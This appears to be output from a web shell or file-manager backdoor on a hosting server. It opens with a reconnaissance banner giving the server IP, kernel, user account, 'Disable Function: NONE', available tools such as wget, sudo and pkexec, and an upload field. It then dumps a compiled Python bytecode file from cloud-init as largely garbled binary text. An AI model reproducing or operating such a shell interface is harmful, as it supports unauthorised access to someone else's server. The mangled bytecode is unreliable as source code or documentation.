| Server IP : 162.144.4.212 / Your IP : 216.73.216.108 Web Server : Apache System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64 User : cozeellc ( 2980) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/lib/python3.9/site-packages/cloudinit/__pycache__/ |
Upload File : |
a
'�Dg� � @ sr d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m
Z
e�e�Z
ed�dd�ZG d d
� d
�ZdS )z#A module for common socket helpers.� N)�suppress)�performance)�DEFAULT_RUN_DIR)�messagec C s� t j�dd�}|sdS |d dkr2|�ddd� n|d dkrFtd ��t�tjtjtjB ��:}t �
d
t| �� |�|� |�
| �d�� W d � n1 s�0 Y dS )z[Send a sd_notify message.
:param message: sd-notify message (must be valid ascii)
Z
NOTIFY_SOCKET� Nr �@� � �/zUnsupported socket typezSending sd_notify(%s)�ascii)�os�environ�get�replace�OSError�socket�AF_UNIX�
SOCK_DGRAM�SOCK_CLOEXEC�LOG�info�str�connect�sendall�encode)r �socket_path�sock� r �4/usr/lib/python3.9/site-packages/cloudinit/socket.py� sd_notify s �
r c @ s<